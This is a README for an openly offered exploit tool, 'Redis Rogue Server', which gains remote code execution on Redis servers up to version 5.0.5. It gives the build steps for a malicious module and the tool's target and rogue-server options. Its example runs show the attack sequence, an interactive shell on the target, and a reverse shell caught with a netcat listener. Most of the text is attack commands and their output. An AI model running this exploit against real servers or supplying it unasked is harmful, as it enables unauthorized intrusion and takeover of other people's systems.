# Redis Rogue Server A exploit for Redis(<=5.0.5) RCE, inspired by [Redis post-exploitation](https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf). __Support interactive shell and reverse shell!__ ## Requirements Python 3.6+ If you want to modify or recompile the redis module, you also require `make`. ## Usage Compile exploit: ``` bash cd RedisModulesSDK/exp/ make ``` Copy the .so file to same folder with `redis-rogue-server.py`. ``` ➜ ./redis-rogue-server.py -h ______ _ _ ______ _____ | ___ \ | (_) | ___ \ / ___| | |_/ /___ __| |_ ___ | |_/ /___ __ _ _ _ ___ \ `--. ___ _ ____ _____ _ __ | // _ \/ _` | / __| | // _ \ / _` | | | |/ _ \ `--. \/ _ \ '__\ \ / / _ \ '__| | |\ \ __/ (_| | \__ \ | |\ \ (_) | (_| | |_| | __/ /\__/ / __/ | \ V / __/ | \_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_| \_/ \___|_| __/ | |___/ @copyright n0b0dy @ r3kapig Usage: redis-rogue-server.py [options] Options: -h, --help show this help message and exit --rhost=REMOTE_HOST target host --rport=REMOTE_PORT target redis port, default 6379 --lhost=LOCAL_HOST rogue server ip --lport=LOCAL_PORT rogue server listen port, default 21000 --exp=EXP_FILE Redis Module to load, default exp.so -v, --verbose Show full data stream ``` ## Example ### Interactive shell ``` ➜ ./redis-rogue-server.py --rhost 127.0.0.1 --lhost 127.0.0.1 ______ _ _ ______ _____ | ___ \ | (_) | ___ \ / ___| | |_/ /___ __| |_ ___ | |_/ /___ __ _ _ _ ___ \ `--. ___ _ ____ _____ _ __ | // _ \/ _` | / __| | // _ \ / _` | | | |/ _ \ `--. \/ _ \ '__\ \ / / _ \ '__| | |\ \ __/ (_| | \__ \ | |\ \ (_) | (_| | |_| | __/ /\__/ / __/ | \ V / __/ | \_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_| \_/ \___|_| __/ | |___/ @copyright n0b0dy @ r3kapig [info] TARGET 127.0.0.1:6379 [info] SERVER 127.0.0.1:21000 [info] Setting master... [info] Setting dbfilename... [info] Loading module... [info] Temerory cleaning up... What do u want, [i]nteractive shell or [r]everse shell: i [info] Interact mode start, enter "exit" to quit. [<<] whoami [>>] :n0b0dy [<<] ``` ### Reverse shell Invoke reverse shell: ``` ➜ ./redis-rogue-server.py --rhost 127.0.0.1 --lhost 127.0.0.1 ______ _ _ ______ _____ | ___ \ | (_) | ___ \ / ___| | |_/ /___ __| |_ ___ | |_/ /___ __ _ _ _ ___ \ `--. ___ _ ____ _____ _ __ | // _ \/ _` | / __| | // _ \ / _` | | | |/ _ \ `--. \/ _ \ '__\ \ / / _ \ '__| | |\ \ __/ (_| | \__ \ | |\ \ (_) | (_| | |_| | __/ /\__/ / __/ | \ V / __/ | \_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_| \_/ \___|_| __/ | |___/ @copyright n0b0dy @ r3kapig [info] TARGET 127.0.0.1:6379 [info] SERVER 127.0.0.1:21000 [info] Setting master... [info] Setting dbfilename... [info] Loading module... [info] Temerory cleaning up... What do u want, [i]nteractive shell or [r]everse shell: r [info] Open reverse shell... Reverse server address: 127.0.0.1 Reverse server port: 9999 [info] Reverse shell payload sent. [info] Check at 127.0.0.1:9999 [info] Unload module... ``` Receive reverse shell: ``` ➜ nc -lvvp 9999 Listening on [0.0.0.0] (family 0, port 9999) Connection from localhost.localdomain 39312 received! whoami n0b0dy ``` ## Thanks * [RicterZ](https://github.com/RicterZ)'s redis exec module: